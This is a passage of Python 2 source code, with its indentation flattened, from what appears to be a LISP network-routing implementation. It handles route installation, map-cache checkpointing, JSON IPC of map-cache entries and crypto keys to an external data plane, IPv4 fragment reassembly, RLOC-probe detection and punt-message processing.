else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
